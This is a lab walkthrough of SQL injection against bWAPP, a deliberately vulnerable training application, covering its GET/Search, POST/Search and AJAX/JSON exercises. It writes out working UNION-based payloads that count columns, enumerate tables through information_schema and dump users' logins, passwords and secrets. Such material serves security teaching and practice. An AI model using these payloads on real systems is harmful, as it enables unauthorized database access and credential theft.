# SQL Injection with bWAPP

## URL  - [`http://192.168.31.112:8086`](http://192.168.31.112:8086)

Go to SQL Injection (GET/Search)

![](https://990422818-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LWGXF4oLcghA1GLq0CM%2F-MJsLk_UZFdE_nIsWAZb%2F-MJsSjjs6gB2KkX6JJU6%2Fimage.png?alt=media\&token=45f514cf-e727-4191-910d-937130029d94)

Lets put `'` see what happens

![](https://990422818-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LWGXF4oLcghA1GLq0CM%2F-MJsLk_UZFdE_nIsWAZb%2F-MJsRsnHyDpxGym09txv%2Fimage.png?alt=media\&token=9511c4c0-10a1-4e1b-b5dc-3a9a5b5ab909)

Lets try and use `' order by 6 -- -`

![](https://990422818-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LWGXF4oLcghA1GLq0CM%2F-MJsLk_UZFdE_nIsWAZb%2F-MJsSEH2X2T2F04XWO6X%2Fimage.png?alt=media\&token=705de063-e012-44c4-9905-ea4e70e90156)

Lets check if we have any users table in bWAPP using the below code

```
' and 1=0 union all select 1,table_schema,table_name,4,5,6,7 from information_schema.tables where table_schema != 'mysql' and table_schema != 'information_schema' -- -
```

![](https://990422818-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LWGXF4oLcghA1GLq0CM%2F-MJsSuSVynPII-H5W7vp%2F-MJsU3QNHwPOlHD1MRF9%2Fimage.png?alt=media\&token=57fdf910-7885-4165-9e93-f0ffd275b8ef)

We can see user table exists, Lets try and find the users.

```
' and 1=0 union all select 1,table_name, column_name,4,5,6,7 from information_schema.columns where table_schema != 'mysql' and table_schema != 'information_schema' and table_schema='bWAPP' and table_name='users' -- -

```

![](https://990422818-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LWGXF4oLcghA1GLq0CM%2F-MJsSuSVynPII-H5W7vp%2F-MJsUv6oXXbHSZhVkPzc%2Fimage.png?alt=media\&token=9996664b-dbe4-4fe0-8657-ea4b392618a8)

Now we have all we need to retrieve all users secrets

```
' and 1=0 union all select 1,login,password,secret,email,admin,7 from users-- -
```

![](https://990422818-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LWGXF4oLcghA1GLq0CM%2F-MJsSuSVynPII-H5W7vp%2F-MJsVISz-Yf6G2l7BgDr%2Fimage.png?alt=media\&token=b39434a0-efe7-4f01-8282-9e2dc5c144c4)

## SQL Injection (POST/Search)&#x20;

Add the below query to the URL&#x20;

Using this SQL query we can get all of table schema and names from information\_schema.tables.

```
' and 1 = 0 union all select 1,table_schema,table_name,4,5,6,7 from information_schema.tables where 1=0 or 1=1-- '
```

![](https://990422818-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LWGXF4oLcghA1GLq0CM%2F-MJsVjxRea7E6z99AoKU%2F-MJsXh90s211ExkSRkd6%2Fimage.png?alt=media\&token=a54887df-d8ff-4706-b477-ed082b1f5814)

Let's enter  table name to query to get columns names of table like "Heroes Table"

```
' and 1=0 union all select 1,column_name,3,4,5,6,7 from information_schema.columns where table_name = 'heroes' and table_schema = 'bwapp'-- '

```

![](https://990422818-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LWGXF4oLcghA1GLq0CM%2F-MJsVjxRea7E6z99AoKU%2F-MJsYELBT3xPaDWNTJoK%2Fimage.png?alt=media\&token=25fb9aa4-9e7d-47d0-8902-f48cdf6fafb0)

## SQL Injection (AJAX/JSON/jQuery)

we can find columns with ‘order by’ command. query: `'order by 7 -- -`

![](https://990422818-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LWGXF4oLcghA1GLq0CM%2F-MJsYbesvinfrLWtXzko%2F-MJsZ_vTMVyh1W8oe4Em%2Fimage.png?alt=media\&token=0ba442f6-4a4d-466a-a911-a7bf27974961)

Let check with `'order by 8 -- -`&#x20;

![](https://990422818-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LWGXF4oLcghA1GLq0CM%2F-MJsYbesvinfrLWtXzko%2F-MJs_6gK5fMP1ztJCq1r%2Fimage.png?alt=media\&token=4313d3ba-b82c-447e-9bf6-21149195c4ba)

On order by 8, it was not appearing anything, so we can assume that it has only 7 columns.